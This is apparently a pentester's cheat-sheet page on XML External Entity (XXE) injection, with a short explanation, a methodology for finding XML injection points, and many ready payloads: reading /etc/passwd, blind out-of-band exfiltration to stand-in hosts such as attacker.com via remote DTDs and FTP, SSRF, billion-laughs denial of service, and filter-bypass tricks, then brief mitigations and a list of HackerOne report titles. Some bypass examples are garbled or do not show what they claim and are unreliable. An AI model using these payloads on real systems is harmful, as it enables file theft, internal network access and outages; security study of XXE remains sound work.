XXE
CWE-611: Improper Restriction of XML External Entity Reference

What is XXE (XML External Entity) Vulnerability?
XML External Entity (XXE) is a type of vulnerability that occurs when an application processes user-supplied XML data without properly validating it. In XML, the term Entity refers to a storage unit of data, which can be internal (within the XML document) or external (an external file or URL). An attacker can exploit XXE to:
Read arbitrary files on the server (e.g.,
/etc/passwd
).Make requests to internal systems (Server-Side Request Forgery, SSRF).
Cause denial of service (DoS) by using large external entities.
Exfiltrate data by sending sensitive information to an external entity controlled by the attacker.
There are various types of XXE attacks:
Exploiting XXE to Retrieve Files
Where an external entity is defined containing the contents of a file, and returned in the application's response.
Exploiting XXE to Perform SSRF Attacks
Where an external entity is defined based on a URL to a back-end system.
Exploiting Blind XXE Exfiltrate Data Out-of-Band
Where sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting blind XXE to Retrieve Data Via Error Messages
Where the attacker can trigger a parsing error message containing sensitive data.
Methodology whitechaitai
Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "applcation/xml".
File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into the xml files.
If svg allowed in picture upload , you can inject xml in svgs.
If the web app offers RSS feeds , add your milicious code into the RSS.
Fuzz for /soap api , some applications still running soap apis
If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse
Test Payload
Using private External Entity#
<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY cat "Tom">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>
Using a public External Entity#
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY cat SYSTEM "file:///etc/passwd">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>
CDATA
Exploitation
LFI Test
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
Blind LFI test (when first case doesn't return anything)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
Access Control bypass (loading restricted resources - PHP example)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>∾</result></foo>
SSRF Test
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "<https://www.example.com/text.txt>">]><foo>&xxe;</foo>
XEE (XML Entity Expansion - DOS)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XEE #2 (Remote attack - through external xml inclusion)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "<https://example.com/entity1.xml>">]>
<lolz><lol>3..2..1...&test<lol></lolz>
XXE FTP HTTP Server
https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "<http://publicServer.com/parameterEntity_sendftp.dtd>">
%remote;
%send;
]>
<data>4</data>
File stored on <http://publicServer.com/parameterEntity_sendftp.dtd>
<!ENTITY % param1 "<!ENTITY % send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;
XXE UTF-7
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
To convert between UTF-8 & UTF-7 use recode. recode UTF8..UTF7 payload-file.xml
Bypassing Filters that Block "ENTITY":
If a web application is filtering or blocking the word "ENTITY" to prevent XXE attacks, there are several bypass techniques you can try:
1. Case Manipulation:
Some filters are case-sensitive and may only block the exact string
ENTITY
in uppercase. You can try different cases, such as:<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Test variations like:
<!entity>
<!EnTiTy>
2. Use Parameter Entities:
Instead of defining an external entity directly, you can use parameter entities (which start with
%
) to indirectly reference the malicious entity:<?xml version="1.0" ?> <!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd"> %dtd; ]> <foo>&xxe;</foo>
The malicious
.dtd
file hosted onattacker.com
could contain the payload for reading a file.
3. Hex Encoding:
Sometimes, filters may miss encoded characters. You can try encoding the word
ENTITY
using its hexadecimal or decimal representation in XML:<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
This encodes "ENTITY" in decimal (69 for 'E', 78 for 'N', etc.). In hex, it would be
<!ENTITY xxe SYSTEM "file:///etc/passwd">
.
4. Using DTD Chaining:
If you have control over external DTDs, you can chain DTDs to bypass filters. This involves referencing a remote DTD file hosted by the attacker:
<!DOCTYPE foo [ <!ENTITY % remote SYSTEM "http://attacker.com/external.dtd"> %remote; ]>
The external DTD file (
external.dtd
) can define the malicious entity, bypassing local filters.
5. XML Comments:
Sometimes filters miss entities hidden inside XML comments. You can obfuscate the payload by breaking the word
ENTITY
into parts:<!DOCTYPE foo [ <!--<!ENTITY xxe SYSTEM "file:///etc/passwd">--> <!ENT--><!--ITY xxe SYSTEM "file:///etc/passwd">--> ]>
6. Base64 Encoding:
You might be able to encode the payload and then decode it at runtime. Some parsers allow you to inject base64-encoded external entities and decode them:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "data:text/plain;base64,L2V0Yy9wYXNzd2Q="> ]> <foo>&xxe;</foo>
This base64 string decodes to
/etc/passwd
.
7. Alternative External Sources (e.g., SYSTEM
or PUBLIC
):
Instead of using
ENTITY
, try to reference external files or URLs using alternative methods. For example:<!DOCTYPE foo PUBLIC "-//OASIS//DTD Entity Resolution XML//EN" "http://attacker.com/malicious.dtd">
Here, the external DTD contains the payload, and you avoid using the
ENTITY
keyword.
Mitigation:
From a defensive perspective, to mitigate XXE attacks:
Disable external entity processing in XML parsers where it's not needed.
Use whitelisting for acceptable file or URL references in XML files.
Implement input validation to ensure only valid, trusted XML is processed.
Ensure your application is updated to use parsers that are not vulnerable to XXE by default.
References :
π XML External Entity (XXE) Processing
π XML External Entity Prevention Cheat Sheet
π Testing for XML Injection (OTG-INPVAL-008)
Top XXE reports from HackerOne:
XXE at ecjobs.starbucks.com.cn/retail/hxpublic_v6/hxdynamicpage6.aspx to Starbucks - 308 upvotes, $4000
XXE on pulse.mail.ru to Mail.ru - 263 upvotes, $6000
XXE on sms-be-vip.twitter.com in SXMP Processor to Twitter - 250 upvotes, $10080
XXE on https://duckduckgo.com to DuckDuckGo - 209 upvotes, $0
Phone Call to XXE via Interactive Voice Response to ββββββ - 170 upvotes, $0
Partial bypass of #483774 with Blind XXE on https://duckduckgo.com to DuckDuckGo - 151 upvotes, $0
Multiple endpoints are vulnerable to XML External Entity injection (XXE) to Pornhub - 136 upvotes, $2500
XXE through injection of a payload in the XMP metadata of a JPEG file to Informatica - 128 upvotes, $0
XXE Injection through SVG image upload leads to SSRF to Zivver - 111 upvotes, $0
XXE in Site Audit function exposing file and directory contents to Semrush - 99 upvotes, $2000
[RCE] Unserialize to XXE - file disclosure on ams.upload.pornhub.com to Pornhub - 89 upvotes, $10000
XXE in DoD website that may lead to RCE to U.S. Dept Of Defense - 89 upvotes, $0
Blind XXE via Powerpoint files to Open-Xchange - 86 upvotes, $2000
blind XXE in autodiscover parser to Mail.ru - 70 upvotes, $5000
LFI and SSRF via XXE in emblem editor to Rockstar Games - 68 upvotes, $1500
Blind OOB XXE At "http://ubermovement.com/" to Uber - 55 upvotes, $500
XXE Π½Π° webdav.mail.ru - PROPFIND/PROPPATCH to Mail.ru - 54 upvotes, $10000
XXE on ββββββββββ by bypassing WAF ββββ to QIWI - 53 upvotes, $5000
[rev-app.informatica.com] - XXE to Informatica - 44 upvotes, $0
RCE via Local File Read -> php unserialization-> XXE -> unpickling to h1-5411-CTF - 43 upvotes, $0
XML External Entity (XXE) in qiwi.com + waf bypass to QIWI - 39 upvotes, $3137
Authenticated XXE to WordPress - 39 upvotes, $600
XML Parser Bug: XXE over which leads to RCE to drchrono - 32 upvotes, $700
XXE on DoD web server to U.S. Dept Of Defense - 31 upvotes, $0
Singapore - XXE at https://www.starbucks.com.sg/RestApi/soap11 to Starbucks - 28 upvotes, $500
[app.informaticaondemand.com] XXE to Informatica - 24 upvotes, $0
Blind XXE on my.mail.ru to Mail.ru - 23 upvotes, $800
Non-production Open Database In Combination With XXE Leads To SSRF to Evernote - 23 upvotes, $0
XXE in upload file feature to Informatica - 21 upvotes, $0
Last updated
Was this helpful?